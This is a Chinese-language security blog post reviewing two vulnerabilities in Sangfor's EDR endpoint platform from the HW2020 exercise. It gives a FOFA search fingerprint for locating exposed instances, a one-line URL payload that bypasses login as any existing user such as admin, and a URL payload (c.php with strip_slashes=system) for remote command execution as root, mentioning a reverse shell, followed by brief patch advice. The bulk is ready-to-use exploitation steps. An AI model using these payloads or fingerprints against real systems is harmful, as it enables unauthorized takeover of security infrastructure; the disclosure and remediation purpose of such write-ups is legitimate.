【HW2020漏洞回顾】深信服EDR两大漏洞

深信服终端检测响应平台EDR，围绕终端资产安全生命周期，通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。支持统一化的终端资产管理、终端病毒查杀、终端合规性检查和访问控制策略管理，支持对安全事件的一键隔离处置，以及对热点事件IOC的全网威胁定位。绝大多数的EDR管理平台部署于内网环境中，少数系统可以通过外网地址访问。

 

NO.1  后台任意用户登陆漏洞

【详情】攻击者可以通过构造payload绕过登录判断，直接拿到系统管理员/用户权限。漏洞影响版本<=v3.2.19。

【漏洞复现】

1）fofa指纹：title="终端检测响应平台"，如图一所示，而后点击进入登录界面（图二）

图一

图二

2)Payload：https://ip:xx/ui/login.php?user=任意用户名，如https://ip:xx/ui/login.php?user=admin，回车即可成功登录平台（图三）

图三

注：该用户名须存在

 

NO.2   远程命令执行漏洞CNVD-2020-46552

【详情】

攻击者可通过构造HTTP请求来利用此漏洞，成功利用此漏洞的攻击者可以在目标主机上执行任意命令。国家信息安全漏洞共享平台（CNVD）已于8月18日收录该漏洞。CNVD对该漏洞的综合评级为“高危，漏洞影响版本v3.2.16-19”。

【漏洞复现】

1）构造Payload，这里漏洞文件是c.php，漏洞参数是host

/tool/log/c.php?strip_slashes=system&host=id

2）root权限（图4）

图4

3）反弹shell（图5）

图5

【修复建议】官方已发布更新版本和修复补丁，用户只需更新至3.2.21版本或升级补丁可修复该漏洞。

 

针对深信服EDR系统近期出现的大量漏洞，建议系统使用方运营者及时自查，发现存在漏洞后，按照漏洞处置建议及时进行加固处置。

以上内容由yufei投稿，信安客出品，信安客——打造网络安全高端人才。